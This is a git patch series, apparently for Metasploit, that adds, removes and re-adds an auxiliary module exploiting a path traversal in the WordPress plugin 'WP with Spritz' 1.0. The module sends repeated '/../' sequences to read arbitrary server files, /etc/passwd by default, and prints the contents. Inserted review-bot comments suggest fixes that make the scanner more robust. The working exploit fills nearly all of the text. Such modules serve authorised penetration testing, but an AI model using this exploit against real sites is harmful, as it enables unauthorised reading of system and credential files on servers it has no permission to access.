From 0ddfad506a1872ba6a4901535dd021b3218fee51 Mon Sep 17 00:00:00 2001
From: Mateus Lino
Date: Sun, 29 Apr 2018 23:52:00 -0300
Subject: [PATCH 1/3] Create scannerwp_with_spritz.rb
---
modules/auxiliary/scannerwp_with_spritz.rb | 51 ++++++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 modules/auxiliary/scannerwp_with_spritz.rb
diff --git a/modules/auxiliary/scannerwp_with_spritz.rb b/modules/auxiliary/scannerwp_with_spritz.rb
new file mode 100644
index 0000000..010c1bc
--- /dev/null
+++ b/modules/auxiliary/scannerwp_with_spritz.rb
@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'WordPress Plugin WP with Spritz 1.0',
+ 'Description' => %q{
+ This is module exploit a Path Transversal in wordpress plugin "WP with Spritz" at version 1.0
+ },
+ 'References' =>
+ [
+ ['EDB', '44544']
+ ],
+ 'Author' =>
+ [
+ 'Wadeek', # Vulnerability discovery
+ 'Mateus Lino ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ OptString.new('FILEPATH', [true, 'The path ', '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'Traversal Depth ', 4 ])
+ ])
+ end
+ def run_host(ip)
+ transversal = "/../" * datastore['DEPTH']
+ filename = datastore['FILEPATH']
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(wordpress_url_plugins, 'wp-with-spritz', 'wp.spritz.content.filter.php'),
+ 'vars_get' =>
+ {
+ 'url' => "#{transversal}#{filename}"
+ })
+if res.code == 200
+ print_good("Path Exploitable:")
+ print_status(res.body)
+else
+ print_error("Nothing was found.")
+end
+ end
+end
From 8d78a91ae78b1469bc90b66e9b5fb75380c75b00 Mon Sep 17 00:00:00 2001
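Review bot: In `run_host`, `res.code` is read without checking that `send_request_cgi` returned a response; it returns nil on a timeout or refused connection, so a single unreachable host raises NoMethodError instead of being reported as not found. Guard the branch with `if res && res.code == 200`. The identical hunk in patch 3/3 (`modules/auxiliary/scanner/http/wp_with_spritz.rb`) has the same gap, and since patch 2/3 deletes this copy, that is the file where the fix needs to land.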
From: Mateus Lino
Date: Sun, 29 Apr 2018 23:52:12 -0300
Subject: [PATCH 2/3] Delete scannerwp_with_spritz.rb
---
modules/auxiliary/scannerwp_with_spritz.rb | 51 ----------------------
1 file changed, 51 deletions(-)
delete mode 100644 modules/auxiliary/scannerwp_with_spritz.rb
diff --git a/modules/auxiliary/scannerwp_with_spritz.rb b/modules/auxiliary/scannerwp_with_spritz.rb
deleted file mode 100644
index 010c1bc..0000000
--- a/modules/auxiliary/scannerwp_with_spritz.rb
+++ /dev/null
@@ -1,51 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-class MetasploitModule < Msf::Auxiliary
- include Msf::Auxiliary::Report
- include Msf::Exploit::Remote::HTTP::Wordpress
- include Msf::Auxiliary::Scanner
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'WordPress Plugin WP with Spritz 1.0',
- 'Description' => %q{
- This is module exploit a Path Transversal in wordpress plugin "WP with Spritz" at version 1.0
- },
- 'References' =>
- [
- ['EDB', '44544']
- ],
- 'Author' =>
- [
- 'Wadeek', # Vulnerability discovery
- 'Mateus Lino ' # Metasploit module
- ],
- 'License' => MSF_LICENSE
- ))
-
- register_options(
- [
- OptString.new('FILEPATH', [true, 'The path ', '/etc/passwd']),
- OptInt.new('DEPTH', [true, 'Traversal Depth ', 4 ])
- ])
- end
- def run_host(ip)
- transversal = "/../" * datastore['DEPTH']
- filename = datastore['FILEPATH']
- res = send_request_cgi(
- 'method' => 'GET',
- 'uri' => normalize_uri(wordpress_url_plugins, 'wp-with-spritz', 'wp.spritz.content.filter.php'),
- 'vars_get' =>
- {
- 'url' => "#{transversal}#{filename}"
- })
-if res.code == 200
- print_good("Path Exploitable:")
- print_status(res.body)
-else
- print_error("Nothing was found.")
-end
- end
-end
From 945a4b46286ec177da84a6554b2f727bf3ad9a93 Mon Sep 17 00:00:00 2001
From: Mateus Lino
Date: Sun, 29 Apr 2018 23:52:59 -0300
Subject: [PATCH 3/3] Create wp_with_spritz.rb
---
.../auxiliary/scanner/http/wp_with_spritz.rb | 51 +++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 modules/auxiliary/scanner/http/wp_with_spritz.rb
diff --git a/modules/auxiliary/scanner/http/wp_with_spritz.rb b/modules/auxiliary/scanner/http/wp_with_spritz.rb
new file mode 100644
index 0000000..010c1bc
--- /dev/null
+++ b/modules/auxiliary/scanner/http/wp_with_spritz.rb
@@ -0,0 +1,51 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'WordPress Plugin WP with Spritz 1.0',
+ 'Description' => %q{
+ This is module exploit a Path Transversal in wordpress plugin "WP with Spritz" at version 1.0
+ },
+ 'References' =>
+ [
+ ['EDB', '44544']
+ ],
+ 'Author' =>
+ [
+ 'Wadeek', # Vulnerability discovery
+ 'Mateus Lino ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options(
+ [
+ OptString.new('FILEPATH', [true, 'The path ', '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'Traversal Depth ', 4 ])
+ ])
+ end
+ def run_host(ip)
+ transversal = "/../" * datastore['DEPTH']
+ filename = datastore['FILEPATH']
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(wordpress_url_plugins, 'wp-with-spritz', 'wp.spritz.content.filter.php'),
+ 'vars_get' =>
+ {
+ 'url' => "#{transversal}#{filename}"
+ })
+if res.code == 200
+ print_good("Path Exploitable:")
+ print_status(res.body)
+else
+ print_error("Nothing was found.")
+end
+ end
+end
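Review bot: The `if res.code == 200` branch in `run_host` prints "Path Exploitable:" for any 200 response, so a site that answers 200 with an empty body or a generic page would be flagged as vulnerable; for a scanner whose output feeds remediation decisions, that false positive is worth closing. Require at least a non-empty body, e.g. `if res && res.code == 200 && !res.body.to_s.empty?`, and prefix the messages with the host (`print_good("#{peer} - ...")`) so results from a multi-host run can be attributed. `Msf::Auxiliary::Report` is included but nothing in the visible code records a finding, so either use it or drop the include. The `if`/`else` block also sits at column 0 inside the method and should be re-indented to match the rest of `run_host`.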